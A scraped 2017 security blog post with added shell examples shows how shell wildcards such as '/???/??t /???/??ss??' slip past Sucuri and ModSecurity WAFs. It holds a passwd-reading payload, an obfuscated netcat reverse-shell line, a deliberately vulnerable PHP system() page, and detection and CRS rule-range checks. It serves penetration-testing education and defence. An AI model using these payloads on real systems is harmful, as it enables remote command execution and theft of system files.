A typical kit used by pentesters during a WAPT :)

Web Application Firewall (WAF) Evasion Techniques

I can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…

theMiddle
Dec 8, 2017 · 9 min read

Things you may not know about wildcards

The “ls” help output executed using the /???/?s syntax
/bin/cat /etc/passwd executed with wildcards
/???/?c.??????????? -e /???/b??h 2130706433 1337
Executing a reverse shell using wildcards
Enumerating files and directories using the echo command
Enumerating files and directories through a WAF
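How the trick works and where it breaks, as an added example that is not part of the original article: it builds a constructed scratch tree (the bin/ and etc/ layout and the single passwd line are made up for the demo) and runs the wildcard string through sh -c, which is exactly what PHP's system() does with it. The helper names expand_cmdline, match_count, run_via_system, enumerate and looks_like_glob_obfuscation are this example's own.

```shell
#!/bin/sh
# Added example, not code from the article: reproduce the wildcard trick in a
# constructed scratch tree and show its main failure mode (an ambiguous glob).
# The layout below is constructed to mimic the pieces of / the glob relies on.
T=$(mktemp -d)
trap 'rm -rf "$T"' EXIT
mkdir -p "$T/bin" "$T/etc"
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$T/etc/passwd"
# Stand-ins for real binaries: tiny wrappers that exec the real tool from PATH.
for tool in cat cut; do
  printf '#!/bin/sh\nexec %s "$@"\n' "$tool" > "$T/bin/$tool"
  chmod +x "$T/bin/$tool"
done

# expand_cmdline STRING: print each word of STRING after the same word-splitting
# and pathname expansion /bin/sh applies when system() hands it the string.
expand_cmdline() {
  printf '%s\n' $1    # $1 deliberately unquoted so the globs expand
}

# match_count PATTERN: how many existing entries a single glob resolves to.
# A payload is only reliable when every glob in it resolves to exactly one path.
match_count() {
  n=0
  for p in $1; do
    [ -e "$p" ] && n=$((n + 1))
  done
  echo "$n"
}

# run_via_system STRING: what a PHP system($_GET['c']) call does with the value.
run_via_system() {
  sh -c "$1"
}

# enumerate DIR: the "echo /*" trick, listing two levels without ever calling ls.
enumerate() {
  echo "$1"/*/*
}

# looks_like_glob_obfuscation VALUE: succeed when a parameter value carries a
# path token made of '?' runs, the signature of this trick. Detection heuristic
# added for this example; it is not a CRS rule.
looks_like_glob_obfuscation() {
  printf '%s' "$1" | grep -Eq '(^|[ /])\?\?+(/| |$)'
}

printf 'ambiguous   %s matches: %s\n' "$T/???/??t" "$(match_count "$T/???/??t")"
printf 'unambiguous %s matches: %s\n' "$T/???/?at" "$(match_count "$T/???/?at")"
echo "expanded command line:"; expand_cmdline "$T/???/??t $T/???/??ss??"
run_via_system "$T/???/?at $T/???/??ss??"
enumerate "$T"
if looks_like_glob_obfuscation '/???/??t /???/??ss??'; then echo "flagged"; fi
```

The ambiguous pattern is the practical caveat: in the scratch tree /???/??t matches both cat and cut, so the shell runs cat with the cut wrapper and passwd as its two arguments rather than the command you meant. On a real target, check a candidate glob with echo (the same enumeration trick) before committing to it; /???/?at resolves to one file and reads passwd cleanly.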

Sucuri WAF evasion

Test evasion technique on Sucuri WAF
<?php
// Deliberately vulnerable test page: the c parameter is echoed back and then
// passed straight to system(), so the shell expands any wildcards it contains.
echo 'ok: ';
print_r($_GET['c']);
system($_GET['c']);

ModSecurity OWASP CRS 3.0

Paranoia Level for dummies

# -=[ Targets and ASCII Ranges ]=-
#
# 920270: PL1
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 1-255
# Example: Full ASCII range without null character
#
# 920271: PL2
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 9,10,13,32-126,128-255
# Example: Full visible ASCII range, tab, newline
#
# 920272: PL3
# REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES, REQUEST_BODY
# ASCII: 32-36,38-126
# Example: Visible lower ASCII range without percent symbol
#
# 920273: PL4
# ARGS, ARGS_NAMES and REQUEST_BODY
# ASCII: 38,44-46,48-58,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : &
#
# 920274: PL4
# REQUEST_HEADERS without User-Agent, Referer, Cookie
# ASCII: 32,34,38,42-59,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : & " * + / SPACE

Paranoia Level 0 (PL0)

SecAction "id:999,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:tx.paranoia_level=0"
RCE accepted by ModSecurity with PL0 (don’t panic, it’s ok)

Paranoia Level 1 and 2 (PL1, PL2)

SecAction "id:999,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:tx.paranoia_level=1"
With PL1 and PL2 my RCE attack was not blocked and I can read /etc/passwd

Paranoia Level 3 (PL3)

Paranoia Level 4 (PL4)
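Which of the 920270-920273 restricted-character rules a parameter value would trip, and at what paranoia level, as an added example written for this page rather than taken from the article or the CRS project. It reproduces only the byte ranges from the comment block above (920274 is omitted because it scans headers, not ARGS), and the function names in_range and violated_rules are this example's own.

```shell
#!/bin/sh
# Added example, not from the article or the CRS project: report which CRS 3.0
# "restricted character" rules a request parameter value would fire. Only the
# ASCII range checks are modelled; the RCE/SQLi signature rules are not, so
# "none" here does not mean the request survives the full rule set.
# Format: rule:paranoia-level:allowed-byte-ranges, copied from the rule comments.
RULES='920270:1:1-255 920271:2:9,10,13,32-126,128-255 920272:3:32-36,38-126 920273:4:38,44-46,48-58,61,65-90,95,97-122'

# in_range BYTE SPEC: succeed when decimal BYTE falls inside SPEC ("9,10,13,32-126").
in_range() {
  for part in $(printf '%s' "$2" | tr ',' ' '); do
    lo=${part%-*}; hi=${part#*-}      # a bare "38" yields lo=hi=38
    [ "$1" -ge "$lo" ] && [ "$1" -le "$hi" ] && return 0
  done
  return 1
}

# violated_rules VALUE: print the rule ids (with their PL) VALUE trips, or "none".
# Pass the URL-decoded value: CRS runs t:urlDecodeUni on ARGS before these checks.
violated_rules() {
  bytes=$(printf '%s' "$1" | od -An -tu1)
  out=''
  for entry in $RULES; do
    id=${entry%%:*}; rest=${entry#*:}
    pl=${rest%%:*};  spec=${rest#*:}
    for b in $bytes; do
      if ! in_range "$b" "$spec"; then
        out="$out $id(PL$pl)"
        break           # one offending byte is enough for this rule
      fi
    done
  done
  out=${out# }
  printf '%s\n' "${out:-none}"
}

for v in 'user=admin&id=42' '/???/??t /???/??ss??' \
         '/???/?c.??????????? -e /???/b??h 2130706433 1337'; do
  printf '%-50s -> %s\n' "$v" "$(violated_rules "$v")"
done
```

Both wildcard payloads pass the PL1-PL3 ranges (every byte is printable and none is the percent sign that 920272 forbids) and only fall to 920273 at PL4, where the slash, question mark and space are all outside the allowed set. That matches why PL4 is the level at which pure character-set rules start hurting this trick, and also why PL4 produces false positives on ordinary parameters containing paths or spaces.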

Do you want more?

Final thoughts

From my bookmarks

Contacts

secjuice™
